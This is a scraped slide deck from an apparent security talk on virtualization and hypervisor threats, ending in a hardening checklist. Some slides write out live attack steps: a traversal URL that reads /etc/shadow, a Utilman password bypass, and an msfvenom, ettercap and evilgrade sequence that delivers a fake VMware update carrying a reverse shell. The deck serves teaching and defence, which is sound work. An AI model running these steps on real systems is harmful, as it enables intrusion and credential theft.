SlideShare a Scribd company logo
# WHO AM I
Senior Security Engineer
Penetration Testing
Incident Response
DISCLAIMERS
“This presentation do not encourage people to hack.”
(For educational purpose only)
AND
“Presentation do not cover all parts of virtualization Technology area.”
(It is rearranged from my thesis research literature review)
TOPIC
• Virtualization and hypervisor
• Virtualization threats and issues
• Vulnerability Statistic of widely used Hypervisors
• Guest VM Attack
• Virtualization environment network Attack
• Hypervisor Attack
• Hypervisor management and API Attack
• Host Attack from VM
• Docker Breakout by shocker
• Use Virtualization as Attack Tools
• Security for Virtualization
Virtualization
VIRTUALIZATION
Cloud
googleiCloud
VIRTUALIZATION
Cloud
googleiCloud
VIRTUALIZATION
VIRTUALIZATION
vShpere Client
vCenter
XenCenter
Virt-manager
Hypervisor
HYPERVISOR
HYPERVISOR
VM
VM
VM VM
VMVMVMVM VM
HYPERVISOR
VM
VM
VM VM
VMVMVMVM VM
HYPERVISOR
VMware
workstation
HYPERVISORVS DOCKER
**Application containers
Virtualization Threats
Vulnerability Statistic
CVE-DETAIL
cvedetails.com
10
7
11
8
54
58 58
45
cvedetails.com
Bare-metal Hypervisor vulnerability
2008 2009 2010 2011 2012 2013 2014 2015
0 20 40 60 80 100 120 140 160 180 200
DoS
Gain Privileges
Overflow
Code Execution
Gain Information
Memory Corruption
Bypass something
Directory Traversal
XSS
Bare-metal Hypervisor vulnerability 2008-2015
cvedetails.com
52%
15%
12%
7%
6.5%
4.5%
2%
1%
0.5%
IS VIRTUALIZATION THREAT DIFFERENCE
FORM TRADITIONAL ENVIRONMENT ?
OS : Linux , Windows, Solaris
Application : Web, WebService, Mail , FTP, DB
Hardware : CPU , Memory, Storage, NIC, Network
Traditional
Operating System
OS : Linux , Windows, Solaris
Application : Web, WebService, Mail , FTP, DB
Hardware : CPU , Memory, Storage, NIC, Network
XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning
Operating System
Traditional
OS : Linux , Windows, Solaris
Application : Web, WebService, Mail , FTP
Hypervisor components : Kennel , Lib, API, Network
Hardware : CPU , Memory, Storage, NIC, Network
Virtualization
OS : Linux , Windows, Solaris
Application : Web, WebService, Mail , FTP, DB
Hypervisor components : Kennel , Lib, API, Network
Hardware : CPU , Memory, Storage, NIC, Network
XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning
Virtualization
Additional
Attack Surface
GENERALSECURITY ISSUEFOR VIRTUALIZATION
• Information Leakage.
• Unauthorized Access
• Intentionally OR Unintentionally
• USERS OR Administrators
• Data Remain In Storage
• Data Ownership.
• Data Migration when end of service.
• Multi tenancy
• Share resource
• Use VM to commit fraud or Crime
• Laws and regulations
VIRTUALIZATION TECHNICAL SECURITY ISSUE
GUEST VM ATTACK
• Traditional Attacks According To Services
• Guest VM attack other Guest VMs (Same network segment)
• Guest VM attack other Guest VMs on the same Hypervisor (VM hyper Jumping)
• Cross-VM Attack (Side Channel Attack)
• Guest Stealing
• Guest Copy
TRADITIONAL ATTACK
Hypervisor
Guest VM1 Guest VM2
VM ATTACKS OTHERS VM
Hypervisor
Guest VM1 Guest VM2
VM HYPER JUMPING
Hypervisor
Guest VM1 Guest VM2
CROSS-VMATTACK (SIDECHANNEL)
Hypervisor
Guest VM1 Guest VM2
Time or
Computational Power
GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
Hypervisor
Management
API
file
GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
Hypervisor
Management
API
file
GUEST STEALING: VASTO
GUEST STEALING: VASTO
GUEST COPY (Authorized)
- Passwords
- OS
- Mail
- Cookies
- Browser history
- Sensitive Data
- Databases
- Configurations
- Source codes
- Software licenses
- Many more...
GUEST COPY
Copy them
(Unauthorized)
IF ( VM ==win7 or XP)
IF ( VM ==2008 or 2012)
How about password ?
How about password ?
Ans: Reset it !!!
IF ( VM ==2008 or 2012)
Insert CD to make tricky password reset via repair option
Copy cmd.exe to be Utilman.exe
And reboot
Press Windows Key + U
Bravo !!!
ps :http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html
Or add another account as administrator and hashdump
And crack it by JTR
IF ( VM ==Unix) THEN singel_mode ();
Forensic tools to access data
VMDK
Forensic tools to access data
Snapshot
NETWORK ATTACK
• Traditional Attacks According To Services
• vSwitch Attack
• Sniffing
• Scanning
• Mitm
• OPEN VSWITCH CVE-2012-3449 INSECURE DIRECTORY PERMISSIONS VULNERABILITY
• CITRIX XENSERVER VSWITCH CONTROLLER VERSION 6.0.2.
- vSwitch Attack
- SNIFF
L Not much sensitive inmodern VM/Hypervisor
- SCAN
• Directory Traversal
• Brute Force Attack
• Auxiliary/Scanner/Vmware/Vmware_http_login
• Burp Suite Intruder
• Response Splitting
MANAGEMENT API
CVE-2009-3733 :
ESXi Server Directory Traversal Vulnerability
• Vmware Esxi 3.5 Or Earlier
• Fail To Sufficiently Sanitize User-supplied Input Data
• Exploiting The Issue May Allow An Attacker To Obtain Sensitive Information
From The Host Operating System
Hypervisor
Management
API
System
file
CVE-2009-3733 :
ESXi Server Directory Traversal Vulnerability
https://192.168.254.158:8333/sdk/../../../../../../etc/shadow
Hypervisor
Management
API
System
file
CVE-2009-3733 :
ESXi Server Directory Traversal Vulnerability
CVE-2009-3733 :
ESXi Server Directory Traversal Vulnerability
ESX root password
Crack it withJTR !!!
BRUTE FORCE ATTACK
By Metasploit VMware Auxiliary Modules
BRUTE FORCE ATTACK
By Burp Suite Intruder
NO-CVE : HTTP RESPONSE SPLITTING
NO-CVE : HTTP RESPONSE SPLITTING
MANAGEMENT ENVIRONMENT ATTACK
• Hooking
• MiTM
• Fake Update
• Vmware-vilurker
• Evilgrade
HOOKING
MITM
Hypervisor
Management SoftwareAttackerHypervisor
MITM Whichpicture show we are under MiTM attack ???
MITM
We never know !!!!
MITM Whichpicture show we are under MiTM attack ???
MITM
We never know again!!!!
MITM
MITM : vSphere Client
MITM : XenCenter
Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Concept
Internet
softwareupdate.vmware.comESXi
Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Concept
Internet
softwareupdate.vmware.comESXi
Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Concept
Internet
softwareupdate.vmware.comESXi
APR Spoofing
RougeDNS
Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Concept
Internet
softwareupdate.vmware.comESXi
APR Spoofing
RougeDNS
FAKE MANAGEMENTSOFTWAREUPDATE
By vmware_vilurker
Credit:Watcharaphon Wongaphai
FAKE MANAGEMENTSOFTWAREUPDATE
By vmware_vilurker
FAKE MANAGEMENTSOFTWAREUPDATE
By vmware_vilurker
FAKE MANAGEMENTSOFTWAREUPDATE
By Evilgrade
FAKE MANAGEMENTSOFTWAREUPDATE
By Evilgrade
• create msfpayload > agent.exe (/usr/share/isr-evilgrade/agent/)
• create handler wait reverse connection
• add domain upgrade version into /etc/ettercap/etter.dns
• ettercap -tqm arp:remote /victim/ /dnsserver real/ -> p select dns_spoof
• run evilgrade
FAKE MANAGEMENTSOFTWAREUPDATE
By Evilgrade
root@localhost:~# msfvenom –p wondows/meterpreter/reverse_tcp LHOST=10.10.10.74 LPORT=8080 –f exe > /opt/agemt.exe
root@localhost:~# cp /agent.exe /usr/share/isr-evilgrade/agent/agent.exe
root@localhost:~# echo “softwareupdate.vmware.comA10.10.10.74" >> /usr/local/share/ettercap/etter.dns
root@localhost:~# sudo ettercap -tqm arp:remote // //
press p
root@localhost:~# dns_spoof
root@localhost:~# msfconsole
msf>use exploit multi/handler
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 10.10.10.74
msf>set LPORT 8080
msf> exploit
root@localhost :~# evilgrade
evilgrade >config vmware
evilgrade >start By Evilgrade
FAKE MANAGEMENTSOFTWAREUPDATE
Result
FAKE MANAGEMENTSOFTWAREUPDATE
Result
Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Result
Internet
softwareupdate.vmware.comESXi
APR Spoofing
RougeDNS
HYPERVISOR ATTACK
• Compromised Hypervisor (Hyper-jacking)
• Take Full Control
• Running A Rogue Hypervisor On Top Of An Existing Hypervisor
• Install Hypervisor Root Kits
• Denial Of Service (Hypervisor Is A Great Single Point Of Failure)
• HyperCall Hooking/Attack
- DENIAL OF SERVICE : PSOD
- HYPER CALL HOOKING ATTACK
XEN i386
Paravirtualization
• EXAMPLE
• CVE-2013-4553: XEN DOMCTL_GETMEMLIST HYPERCALL IN XEN 3.4.X THROUGH 4.3.X
• CVE-2012-3495 : XEN HYPERCALLPHYSDEV_GET_FREE_PIRQ
• BUFFER OVERFLOW
• DENIAL OF SERVICE
• EXPLOIT CODE TO EXECUTE IN PRIVILEGE
- HYPER CALL HOOKING/ATTACK
CVE-2014-4947 AND 4948
LOCAL USERS DENY SERVICE AND OBTAIN POTENTIALLY SENSITIVE INFORMATION
• CVSS V2 Base Score: 10.0 (High)
• Citrix Xenserver 6.2 SP1 And Prior Versions
• A Local User On The Guest System can Trigger A Buffer Overflow In HVM
(Hardware Virtual MACHINE) Graphics Console Support
• Exploit On The Guest System Can Cause
• Denial Of Service Conditions
• Obtain Potentially Sensitive Information
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
AAAAAAAAAAAAAAAAAAAA...AAAAA
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
ResourcesAAAAAAAAAAAAAAAAAAAA...AAAAA
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
AAAAAAAAAAAAAAAAx00x00x00
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resourcesxxxx
CVE-2015-3456 : VENOM
• Virtualized Environment Neglected Operations Manipulation
• Discovered by Jason Geffner, Crowdstrike senior security researcher
• The bug (Buffer Overflow) is in QEMU’s virtual floppy disk controller (FDC).
• This vulnerable fdc code is used in numerous virtualization platforms and appliances,
notably XEN, KVM, VIRTUALBOX,and the native QEMU client.
• Attackerneed to have administrative or root privileges in the guest operating system in
order to exploit VENOM
• The VENOM vulnerability has existed since 2004, when the virtual floppy disk controller
was first added to the QEMU codebase.
http://www.rapid7.com/resources/videos/venom-vulnerability-explained.jsp
Exploit to make Buffer overflow within the FDC,
break out of the VM
Exploit to make Buffer overflow within the FDC,
break out of the VM
Can access other VMs within that hypervisor
Exploit to make Buffer overflow within the FDC,
break out of the VM
Can access other VMs within that hypervisor
Can jump other VMs in other hypervisor
Exploit to make Buffer overflow within the FDC,
break out of the VM
Can access other VMs within that hypervisor
Can jump other VMs in other hypervisor
Can access to the underlying bare
metal systems hardware and use that
to see other systems on the
hypervisor's network
HOST ATTACK
VM ESCAPE
Resources
Hypervisor
Host
VM
HOST ATTACK
- USING PATHTRAVERSAL VULNERABILITY IN VMWARE'S SHARED FOLDERS
- CVE-2008-0923
- INSUFFICENT INPUT VALIDATION
VM ESCAPE
0xc20x2e0xc20x2e 0x2e0x2e ..
../../../../../../boot.ini
VM ESCAPE
modify VMFtp's source code to replace all occurrences of '+' with 'xc2' in an input pathname
VM ESCAPE
OR
VM ESCAPE
Modify task schedule as new jobto run metX.exe and put to back to /windows/tasks
Put create task to host
Generate meterpreter
VM ESCAPE
VM ESCAPE
Run handler and waituntil time to run Task
And Compromised
CVE-2012-0217
Virtualization Software Vulnerable To Privilege Escalation AttacksOn Intel64bits CPU
• Some 64-bit operating systems and virtualization software programs are vulnerable
to local privilege escalation attackswhen running on intel processors (cpus)
• Implemented The SYSRET Instruction In Their X86-64 Extension
• Attackerscould exploit the vulnerability to force intel cpus to return a general
protection fault in privileged mode
• Windows 7 And Windows Server 2008 R2, The 64-bit Versions Of Freebsd And Netbsd,
The Xen Virtualization Software, As Well As Red Hat Enterprise Linux And SUSE
Linux Enterprise Server, Which Include The Xen Hypervisor By Default
Architecture Vulnerability.
Architecture Vulnerability.
CVE-2012-0217
Virtualization Software Vulnerable To Privilege Escalation AttacksOn Intel64bits CPU
code
MALICIOUS SCRIPT IN HYPERVISOR
ROP
• Xen Hypervisor Utilizing Return-orientedProgramming (ROP).
• It modifies the data in the hypervisor that controls whether a VM is privileged
or not and thus can escalate the privilege of an unprivileged domain (DomU)
ROP
ROP
ROP
ROP Make Buffer
overflow
ROP
L Unfortunately, this technique need a lot of factor to make it possible intoday Hypervisor
FUZZING
USE VIRTUALIZATIONAS ATTACK TOOL
- Host Stealing (P2v host cloning)
VMware vCenter Converter Standalone
10.200.1.10
Administrator
*************************
10.200.1.100
root
*************************
10.200.1.10010.200.1.10
- Compromised Host
- Get root/admin password
0
10.200.1.10
Administrator
*************************
Victim
10.200.1.100
root
*************************
ESX, Vmware
workstation
on
Hacker
Machine
10.200.1.10010.200.1.10
Wait until finish
Don’t forget to Dump RAM, too!!!
P2V don’t copy current data inRAM from victim server
volatility
Meterpreter pmdump
Finish ....and Completely PWN
Have more time to get
- DB ConnectionStrings
- Sever Configurations
- Source code
- Crack more password
- Digmore sensitive files
But.. Noting easy in the real life
But.. Noting easy in the real life
DOCKER BREAKOUT
BY DOCKER SHOCKER
https://github.com/gabrtv/shocker
DOCKER BREAKOUT
BY DOCKER SHOCKER
DOCKER BREAKOUT
BY DOCKER SHOCKER
DOCKER BREAKOUT
BY DOCKER SHOCKER
Security for Virtualization
SECURITY FOR VIRTUALIZATION
• Contract , Law and regulation
• System Segmentation
• VLAN /SDN
• Dedicate Management Network
• Dedicated Storage Networks
• Protect All Virtual System File (Snapshot , VHDD, Configuration)
• Update Patches
• System Hardening
• Implement Security Monitoring And Detection Tools
• Security Assessment !!!!
• BCP / DRP
CONCLUSION
• Traditional Attack methodcan be use to attack Virtualization Technology
• Virtualization Technologyhas more attack surfaces
• Hypervisor is concerned as single point of failure
• Secure by design, Security Protection and hardening are important for
Virtualization Technology
Join to get security news update
Virtualization security and threat

More Related Content

What's hot

Cloud security and security architecture
Cloud security and security architectureCloud security and security architecture
Cloud security and security architecture
Vladimir Jirasek
 
Access Controls
Access ControlsAccess Controls
Access Controls
primeteacher32
 
Cloud Security Demystified
Cloud Security DemystifiedCloud Security Demystified
Cloud Security Demystified
Michael Torres
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
AWS User Group Bengaluru
 
Chapter 5 - Identity Management
Chapter 5 - Identity ManagementChapter 5 - Identity Management
Chapter 5 - Identity Management
Karthikeyan Dhayalan
 
Network attacks
Network attacksNetwork attacks
Network attacks
Manjushree Mashal
 
CISSP Cheatsheet.pdf
CISSP Cheatsheet.pdfCISSP Cheatsheet.pdf
CISSP Cheatsheet.pdf
shyedshahriar
 
SOAR and SIEM.pptx
SOAR and SIEM.pptxSOAR and SIEM.pptx
SOAR and SIEM.pptx
Ajit Wadhawan
 
Security patterns and model driven architecture
Security patterns and model driven architectureSecurity patterns and model driven architecture
Security patterns and model driven architecture
bdemchak
 
Cloud Security: A New Perspective
Cloud Security: A New PerspectiveCloud Security: A New Perspective
Cloud Security: A New Perspective
Wen-Pai Lu
 
Identity and Access Management (IAM)
Identity and Access Management (IAM)Identity and Access Management (IAM)
Identity and Access Management (IAM)
Identacor
 
Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)
LJ PROJECTS
 
CLOUD NATIVE SECURITY
CLOUD NATIVE SECURITYCLOUD NATIVE SECURITY
CLOUD NATIVE SECURITY
Maganathin Veeraragaloo
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...
Edureka!
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics
Mohammed Adam
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
Rashad Aliyev
 
Introduction - Trend Micro Deep Security
Introduction - Trend Micro Deep SecurityIntroduction - Trend Micro Deep Security
Introduction - Trend Micro Deep Security
Andrew Wong
 
Threat Modeling to Reduce Software Security Risk
Threat Modeling to Reduce Software Security RiskThreat Modeling to Reduce Software Security Risk
Threat Modeling to Reduce Software Security Risk
Security Innovation
 
Cloud Privacy & Security compliance
Cloud Privacy & Security complianceCloud Privacy & Security compliance
Cloud Privacy & Security compliance
Bryan Starbuck
 
Risk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksRisk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware Attacks
Marco Morana
 

What's hot (20)

Cloud security and security architecture
Cloud security and security architectureCloud security and security architecture
Cloud security and security architecture
 
Access Controls
Access ControlsAccess Controls
Access Controls
 
Cloud Security Demystified
Cloud Security DemystifiedCloud Security Demystified
Cloud Security Demystified
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
 
Chapter 5 - Identity Management
Chapter 5 - Identity ManagementChapter 5 - Identity Management
Chapter 5 - Identity Management
 
Network attacks
Network attacksNetwork attacks
Network attacks
 
CISSP Cheatsheet.pdf
CISSP Cheatsheet.pdfCISSP Cheatsheet.pdf
CISSP Cheatsheet.pdf
 
SOAR and SIEM.pptx
SOAR and SIEM.pptxSOAR and SIEM.pptx
SOAR and SIEM.pptx
 
Security patterns and model driven architecture
Security patterns and model driven architectureSecurity patterns and model driven architecture
Security patterns and model driven architecture
 
Cloud Security: A New Perspective
Cloud Security: A New PerspectiveCloud Security: A New Perspective
Cloud Security: A New Perspective
 
Identity and Access Management (IAM)
Identity and Access Management (IAM)Identity and Access Management (IAM)
Identity and Access Management (IAM)
 
Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)
 
CLOUD NATIVE SECURITY
CLOUD NATIVE SECURITYCLOUD NATIVE SECURITY
CLOUD NATIVE SECURITY
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
 
Introduction - Trend Micro Deep Security
Introduction - Trend Micro Deep SecurityIntroduction - Trend Micro Deep Security
Introduction - Trend Micro Deep Security
 
Threat Modeling to Reduce Software Security Risk
Threat Modeling to Reduce Software Security RiskThreat Modeling to Reduce Software Security Risk
Threat Modeling to Reduce Software Security Risk
 
Cloud Privacy & Security compliance
Cloud Privacy & Security complianceCloud Privacy & Security compliance
Cloud Privacy & Security compliance
 
Risk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksRisk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware Attacks
 

Viewers also liked

Guest Stealing...The VMware Way
Guest Stealing...The VMware WayGuest Stealing...The VMware Way
Guest Stealing...The VMware WaySecurityTube.Net
 
6. Live VM migration
6. Live VM migration6. Live VM migration
6. Live VM migration
Hwanju Kim
 
Challenges in Cloud Computing – VM Migration
Challenges in Cloud Computing – VM MigrationChallenges in Cloud Computing – VM Migration
Challenges in Cloud Computing – VM Migration
Sarmad Makhdoom
 
Security and Virtualization in the Data Center
Security and Virtualization in the Data CenterSecurity and Virtualization in the Data Center
Security and Virtualization in the Data Center
Cisco Canada
 
Virtualization Security
Virtualization SecurityVirtualization Security
Virtualization Security
syrinxtech
 
Hypervisor Security - OpenStack Summit Hong Kong
Hypervisor Security - OpenStack Summit Hong KongHypervisor Security - OpenStack Summit Hong Kong
Hypervisor Security - OpenStack Summit Hong Kong
Robert Clark
 
Virtualization: Security and IT Audit Perspectives
Virtualization: Security and IT Audit PerspectivesVirtualization: Security and IT Audit Perspectives
Virtualization: Security and IT Audit Perspectives
Jason Chan
 
Virtualization 101: Everything You Need To Know To Get Started With VMware
Virtualization 101: Everything You Need To Know To Get Started With VMwareVirtualization 101: Everything You Need To Know To Get Started With VMware
Virtualization 101: Everything You Need To Know To Get Started With VMware
Datapath Consulting
 

Viewers also liked (8)

Guest Stealing...The VMware Way
Guest Stealing...The VMware WayGuest Stealing...The VMware Way
Guest Stealing...The VMware Way
 
6. Live VM migration
6. Live VM migration6. Live VM migration
6. Live VM migration
 
Challenges in Cloud Computing – VM Migration
Challenges in Cloud Computing – VM MigrationChallenges in Cloud Computing – VM Migration
Challenges in Cloud Computing – VM Migration
 
Security and Virtualization in the Data Center
Security and Virtualization in the Data CenterSecurity and Virtualization in the Data Center
Security and Virtualization in the Data Center
 
Virtualization Security
Virtualization SecurityVirtualization Security
Virtualization Security
 
Hypervisor Security - OpenStack Summit Hong Kong
Hypervisor Security - OpenStack Summit Hong KongHypervisor Security - OpenStack Summit Hong Kong
Hypervisor Security - OpenStack Summit Hong Kong
 
Virtualization: Security and IT Audit Perspectives
Virtualization: Security and IT Audit PerspectivesVirtualization: Security and IT Audit Perspectives
Virtualization: Security and IT Audit Perspectives
 
Virtualization 101: Everything You Need To Know To Get Started With VMware
Virtualization 101: Everything You Need To Know To Get Started With VMwareVirtualization 101: Everything You Need To Know To Get Started With VMware
Virtualization 101: Everything You Need To Know To Get Started With VMware
 

Similar to Virtualization security and threat

10 Cloud Security.pptx
10 Cloud Security.pptx10 Cloud Security.pptx
10 Cloud Security.pptx
2020kucp1072
 
Virtualization presentation
Virtualization presentationVirtualization presentation
Virtualization presentationMangesh Gunjal
 
Virtualization securityv2
Virtualization securityv2Virtualization securityv2
Virtualization securityv2
vivekbhat
 
CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2vivekbhat
 
Cloud security
Cloud securityCloud security
Cloud securityinsoonjo
 
VMworld Europe 2014: Top 10 Do’s / Don’ts of Data Protection For VMware vSphere
VMworld Europe 2014: Top 10 Do’s / Don’ts of Data Protection For VMware vSphereVMworld Europe 2014: Top 10 Do’s / Don’ts of Data Protection For VMware vSphere
VMworld Europe 2014: Top 10 Do’s / Don’ts of Data Protection For VMware vSphere
VMworld
 
Virtualization
VirtualizationVirtualization
Virtualization
Chandan Varadaraj
 
663187411-UNIT-III-Virtualization-System-Specific-Attacks-1.pdf
663187411-UNIT-III-Virtualization-System-Specific-Attacks-1.pdf663187411-UNIT-III-Virtualization-System-Specific-Attacks-1.pdf
663187411-UNIT-III-Virtualization-System-Specific-Attacks-1.pdf
pivanon243
 
Security Best Practices For Hyper V And Server Virtualization
Security Best Practices For Hyper V And Server VirtualizationSecurity Best Practices For Hyper V And Server Virtualization
Security Best Practices For Hyper V And Server Virtualizationrsnarayanan
 
Veeam: Cybersecurity protection solutions through Backup and Availability
Veeam: Cybersecurity protection solutions through Backup and AvailabilityVeeam: Cybersecurity protection solutions through Backup and Availability
Veeam: Cybersecurity protection solutions through Backup and Availability
Next Dimension Inc.
 
Server virtualization
Server virtualizationServer virtualization
Server virtualization
Kingston Smiler
 
Symantec Virtualization Launch VMworld 2012
Symantec Virtualization Launch VMworld 2012Symantec Virtualization Launch VMworld 2012
Symantec Virtualization Launch VMworld 2012
Symantec
 
Integrate 3rd party security solution into CloudStack
Integrate 3rd party security solution into CloudStackIntegrate 3rd party security solution into CloudStack
Integrate 3rd party security solution into CloudStackmice_xia
 
Pandora FMS: VMware Enterprise Plugin
Pandora FMS: VMware Enterprise PluginPandora FMS: VMware Enterprise Plugin
Pandora FMS: VMware Enterprise Plugin
Pandora FMS
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
Alert Logic
 
Vmw edition-comparison
Vmw edition-comparisonVmw edition-comparison
Vmw edition-comparison
AirulMutaqin1
 
Rht v sphere-security
Rht v sphere-securityRht v sphere-security
Rht v sphere-security
mikeponderosa
 
VMUG St Louis - SDN in the Real World
VMUG St Louis - SDN in the Real WorldVMUG St Louis - SDN in the Real World
VMUG St Louis - SDN in the Real World
Chris Wahl
 

Similar to Virtualization security and threat (20)

10 Cloud Security.pptx
10 Cloud Security.pptx10 Cloud Security.pptx
10 Cloud Security.pptx
 
Virtualization presentation
Virtualization presentationVirtualization presentation
Virtualization presentation
 
Virtualization securityv2
Virtualization securityv2Virtualization securityv2
Virtualization securityv2
 
CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2
 
Cloud security
Cloud securityCloud security
Cloud security
 
VMworld Europe 2014: Top 10 Do’s / Don’ts of Data Protection For VMware vSphere
VMworld Europe 2014: Top 10 Do’s / Don’ts of Data Protection For VMware vSphereVMworld Europe 2014: Top 10 Do’s / Don’ts of Data Protection For VMware vSphere
VMworld Europe 2014: Top 10 Do’s / Don’ts of Data Protection For VMware vSphere
 
Virtualization
VirtualizationVirtualization
Virtualization
 
663187411-UNIT-III-Virtualization-System-Specific-Attacks-1.pdf
663187411-UNIT-III-Virtualization-System-Specific-Attacks-1.pdf663187411-UNIT-III-Virtualization-System-Specific-Attacks-1.pdf
663187411-UNIT-III-Virtualization-System-Specific-Attacks-1.pdf
 
Introduction to virtualization
Introduction to virtualizationIntroduction to virtualization
Introduction to virtualization
 
Security Best Practices For Hyper V And Server Virtualization
Security Best Practices For Hyper V And Server VirtualizationSecurity Best Practices For Hyper V And Server Virtualization
Security Best Practices For Hyper V And Server Virtualization
 
Veeam: Cybersecurity protection solutions through Backup and Availability
Veeam: Cybersecurity protection solutions through Backup and AvailabilityVeeam: Cybersecurity protection solutions through Backup and Availability
Veeam: Cybersecurity protection solutions through Backup and Availability
 
Server virtualization
Server virtualizationServer virtualization
Server virtualization
 
Symantec Virtualization Launch VMworld 2012
Symantec Virtualization Launch VMworld 2012Symantec Virtualization Launch VMworld 2012
Symantec Virtualization Launch VMworld 2012
 
Integrate 3rd party security solution into CloudStack
Integrate 3rd party security solution into CloudStackIntegrate 3rd party security solution into CloudStack
Integrate 3rd party security solution into CloudStack
 
Pandora FMS: VMware Enterprise Plugin
Pandora FMS: VMware Enterprise PluginPandora FMS: VMware Enterprise Plugin
Pandora FMS: VMware Enterprise Plugin
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
Vmw edition-comparison
Vmw edition-comparisonVmw edition-comparison
Vmw edition-comparison
 
Rht v sphere-security
Rht v sphere-securityRht v sphere-security
Rht v sphere-security
 
RHT Design for Security
RHT Design for SecurityRHT Design for Security
RHT Design for Security
 
VMUG St Louis - SDN in the Real World
VMUG St Louis - SDN in the Real WorldVMUG St Louis - SDN in the Real World
VMUG St Louis - SDN in the Real World
 

Recently uploaded

The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
